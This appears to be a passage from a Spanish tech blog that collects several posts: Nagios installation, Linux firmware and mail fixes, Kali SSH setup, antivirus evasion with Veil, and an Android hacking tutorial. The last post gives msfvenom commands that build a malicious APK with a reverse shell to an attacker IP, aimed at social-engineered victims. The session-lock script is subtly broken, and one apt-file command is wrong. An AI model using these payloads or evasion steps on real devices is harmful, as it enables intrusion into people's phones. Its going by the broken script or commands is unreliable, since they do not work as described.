Nagios plugins, instalación

Pre-requisites:

  • autoconf
  • gcc
  • libc6
  • libmcrypt-dev
  • make
  • libssl-dev
  • wget
  • bc
  • gawk
  • dc
  • build-essential
  • snmp
  • libnet-snmp-perl
  • gettext

Instalación de las dependencias:

sudo apt install libssl-dev gcc libc6 libmcrypt-dev wget bc gawk dc build-essential snmp gettext libnet-snmp-perl -y

Descargando:

cd /tmp/
git clone https://github.com/nagios-plugins/nagios-plugins/
cd nagios-plugins

Instalando:

./tools/setup
./configure --prefix=/usr/local/nagios --with-cgiurl=/nagios/cgi-bin
make
make install
make install-root

Nagios 4.4.5 instalación en Ubuntu 19.10

Pre-requisitos:

  • PHP
  • LAMP
  • Wget
  • Unzip
  • Apache2
  • gcc
  • PHP Repo
  • Crear Usuario y Grupo

PHP instalación:

Lo primero es añadir el repo:

sudo add-apt-repository ppa:ondrej/php

Ahora toca todos los componentes de PHP y MIBs

sudo apt-get install php7.3-cli php7.3-mbstring php7.3-gd php7.3-opcache php7.3-mysql php7.3-json php7.3-xml php7.3-curl libapache2-mod-php7.2 snmp-mibs-downloader -y

Otros requisitos para poder compliar:

sudo apt-get install -y autoconf gcc libc6 make wget unzip apache2 php libgd-dev

Instalando Nagios

Descaragr Nagios 4.4.5

cd /tmp/
wget https://assets.nagios.com/downloads/nagioscore/releases/nagios-4.4.5.tar.gz
 tar xzf nagios-4.4.5.tar.gz

Ahora toca compilar Nagios:

cd /tmp/nagios-4.4.5/
sudo ./configure --with-httpd-conf=/etc/apache2/sites-enabled

sudo make all

Crear usuarios y grupos:

sudo make install-groups-users
sudo usermod -a -G nagios www-data

Instalar Binarios:

make install

Instalar el servicio / Daemon:

sudo make install-daemoninit

Instalar “Command Mode”:

sudo make install-commandmode

Instalar ficheros de ejemplo de configuraciones:

En este paso vamos ainstalar los ficheros con configuraciones a modo de ejemplo. Éstos son necesarios para que podamos iniciar Nagios.

sudo make install-config

Instalar los ficheros de configuración de Apache:

En este paso se instalan los ficheros de configuración del servidor web Apache y lo configura.

sudo make install-webconf
sudo a2enmod rewrite
sudo a2enmod cgi

Configuración del firewall:

sudo ufw allow Apache
sudo ufw reload

Crear el usario “nagiosadmin”:

Necesitamos crear el usuario nagiosadmin para poder logearnos en la interfaz grafica. El comando que hay que correr para crearlo es el de abjo y nos pedira que le asignemos una contraseña.

sudo htpasswd -c /usr/local/nagios/etc/htpasswd.users nagiosadmin

Iniciar los servicios:

sudo systemctl restart apache2.service
sudo systemctl start nagios.service

Ya podríamos acceder a nuestro nagios 🙂 através de navegador web. http://IP/nagios.

Veréis que hay un error en el servidor monitorizndose a sí mismo si hacéis click sobre él.

(No output on stdout) stderr: execvp(/usr/local/nagios/libexec/check_load, ...) failed. errno is 2: No such file or directory 

Esto es porque los plugins de Nagios no se han instalado todavía, por lo que necesitamos hacerlo. Para ver cómo se hace, sólo tenéis que hacer click aquí.

Mi Linux no me reconoce componentes HW

Aprovechando una duda de uno de los alumnos en el curso de LPIC-1 Administracion de Linux, he escrito este artículo para que quedara claro el proceso de cómo hacer para instalar poder usar hardware que en un inicio nuestro Linux no reconoce.

Esto es raro que pase, normalmente el hardware funciona nada más instalarse el OS. De hecho, a mi sólo me ha pasado una vez que no me funcionó un componente y fue hace muchos años. De hecho, fue con la wifi.

Prueba a correr el comando dmesg, en el curso lo cubrimos pero es posible que todavía no hayas llegado a esa clase. Como te digo corre dmesg y haz un grep con la palabra error o failed.

Es posible que veas algo así como firmware: failed to load wifi/XXXXX.bin (es un ejemplo inventado)

Con esto consigues saber que tienes problemas con el firmware que viene por defecto, y tienes que buscar ese XXXXX.bin para instalarlo correctamente.

Normalemente los firmwares suelen estar en los repos “non free”, en el caso de debian y derivados, serían:

deb http://deb.debian.org/debian buster main contrib non-free
deb-src http://deb.debian.org/debian buster main contrib non-free
 
deb http://deb.debian.org/debian-security/ buster/updates main contrib non-free
deb-src http://deb.debian.org/debian-security/ buster/updates main contrib non-free
 
deb http://deb.debian.org/debian buster-updates main contrib non-free
deb-src http://deb.debian.org/debian buster-updates main contrib non-free

Incorpora esos repos, el archivo que deberías editar para anadir estos repos es:

/etc/apt/sources.list

Lo siguiente es intentar buscar un paquete que contenga lo que te falla, lo harías con:

sudo apt-cache search rtl8192cufw.bin

Si lo encuentra, entonces instala el paquete y testea el componente, es posible que tengas que reiniciar.

Pero… qué ocurre si no te lo encuentra? Pues que tendrás que usar apt-file. Lo que hace apt-file es listar archivos dentro de paquetes. Lo puedes instalar con el siguiente comando:

sudo apt install apt-file

Una vez instalado, puedes correr el comando que te pongo abajo para actualizar la base de datos:

update apt-file database

Una vez actualizada, tiras el apt-file a ver si te encuentra otro paquete que pueda contener el binario que necesitas. Para eso haces

apt-file find XXXXXX.bin

Si te encuentra un paquete que lo contiene, instala ese paquete y testea el componente que te fallaba… que no te funciona?? Entonces ve al espía de Google (o tu espía favorito) y pon XXXXXX.bin debian 10 (o la distro que uses)

Espero que te sirva de ayuda este “procedimiento” y puedas disfrutar de la experiencia Linux sin trabas de este estilo.

Otro truco es.. que si tienes otro SO instalado basado también en Debian en el mismo equipo y te funciona es que busques el paquete o firmware de esas instalación y te lo pases a la que no te va 🙂

Problemas con Evolution mail client después de Fedora 28 upgrade

El otro día hice el upgrade de la version 27 de Fedora a la 28 y nada más terminar, al abrir mi cliente de correo Evolution… ZAS! Fallo con la encriptación TLS…. el correo no funciona lo cual me alegra porque no recibiré más correos 🙂 pero por desgracia lo tengo que arreglar.

Bueno, el problema es que en la nueva versión y, como debe ser… Se ha eliminado el soporte legacy a encriptaciones deprecadas o débiles, por lo que si trabajáis con servidores de correo muy antiguos debéis habilitar el legacy encryption con el siguiente comando:

/usr/bin/update-crypto-policies –set LEGACY

Por supuesto, este comando lo tenéis que ejecutar como root o… con uno que tenga privilegios suficientes.

Token de autenticación para linux

El otro día un compi de curro me pasó el siguiente código para auto bloquear/desbloquear la sesión de linux, dependiendo si está conectado un dispositivo con un UUID concreto. Si está presente, la sesión se desbloquea y si lo desconectamos desaparece. el código es el siguiente:


#!/bin/bash

while true
do

#loginctl lock-session
#Test if drive is inserted
test=/usr/sbin/blkid|grep -q "1dcaa605-cb4c-4853-8fa7-f60h432749b0";echo $?
if [ "$test" = "0" ]
then
loginctl unlock-session
else
loginctl lock-session
fi

sleep 2

De esta manera, y usnado esta idea podemos usar como 2FA nuestro móvil, USB… lo que queramos. Recordad sustituir el UUID (1dcaa605-cb4c-4853-8fa7-f60h432749b0)  por el vuestro, no seais muñones 🙂

Evasión de antivirus con Veil – Instalación (II)

En anteriores posts vimos como instalar Veil-Evasion desde consola usando apt. Podéis repasar el post pulsando aquí.

Pero usando apt no es la única manera de instalarlo por lo que, a continuación os pongo otra manera de tener Veil instalado en Kali.

En una consola de comandos, ejecutamos el siguiente comando:

mkdir GitDownloads

cd GitDownloadscs

git clone https://github.com/Veil-Framework/Veil-Evasion.git

veilgit

Cuando haya terminado tendremos dentro de GitDowloads veremos que tenemos el directorio Veil-Evasion, en setup, así que nos metemos en él y ejecutamos lo siguiente:

cd /root/GitDownloads/Veil-Evasion/setup

./setup

Continue Reading

Evasión de antivirus con Veil – Instalación (I)

A la hora de hacer nuestro Penetration Test debemos tener en cuenta los Antivirus. El antivirus es otra de las capas de seguridad que la mayoría de los PCs/Servidores tienen instalados y que pueden fastidiarnos el ataque por detectar nuestro payload.

Para evitar esta circunstancia tenemos la herramienta Veil. Por defecto no está instalada en nuestra distribución de Kali, por lo que tendremos que proceder a hacer instalación manual.

sudo apt-get update

sudo apt-get install veil-evasion

veil

Una vez terminado ejecutamos el comando:

veil-evasion

El cual nos preguntará si queremos continuar con la instalación. Pulsaremos “y”

veilinst

Durante el proceso de instalción nos va a instalar todas las dependencias como python, ruby y wine. Os irán apareciendo ventanas de instalación de tipo windows así que dadle todo a siguiente.

Con esto concluye la instalación de veil. Para iniciarlo basta con ejecutar:

veil-evasion

Configurar SSH en Kali

Vamos a explicar como acceder a nuestro Kali mediante SSH para poder trabajar con él sin necesidad de estar físicamente delante del PC/Server.

  1. Instalar openSSH server
  2. Habilitar el servicio SSH en el inico
  3. Cambiar las claves por defecto de SSH para evitar ataques de MITM
  4. Cambiar el puerto por defecto de SSH para aumentar así la seguridad.
  5. Modificat el MOTD (opcional)

Para ello, primeramente vamos a utilizar un comando muy útil que nos mostrará la lista de servicios de kali así como su estado.

service –status-all

Continue Reading

Android Hack (I) – Reverse shell con msfvenom

En este post vamos a lanzar un ataque sobre dispositivos android. El objetivo es conseguir una shell remota con la que hacernos con el control. Una vez conseguido, podremos listar, copiar, modificar el contenido del teléfono, comprobar las llamadas, ver por las cámaras, grabar sonido…

Para conseguirlo necesitamos:

Kali
Metasploit
Msfvenom
Ingeniería social
Dispositivo android como víctima

Lo primero que vamos a hacer es crear la apk maliciosa con el payload embebido. En este caso vamos a usar como payload android/meterpreter/reverse_tcp.

Abrimos una shell en Kali y ejecutamos el siguiente comando:

msfvenom -p android/meterpreter/reverse_tcp lhost=[IP de la máquina kali] lport=[puerto (por defecto es 4444)] r > [nombre de la app.apk]
msfvenom -p android/meterpreter/reverse_tcp lhost=10.100.100.30 lport=4444 r > bad.apk

Ya tenemos creada la APK. Por defecto se genera en el directorio en el cual estamos situados cuando lanzamos el comando.

[KGVID]http://melin360.com/wp-content/uploads/2016/09/msfvenom2.webm[/KGVID]

A continuación tenemos que seleccionar el exploit y ponerlo a escuchar en el puerto que definimos en el comando anterior (4444).

Abrimos metasploit ejecutando en una shell el comando msfconsole. Ejecutamos los siguientes comandos:
Continue Reading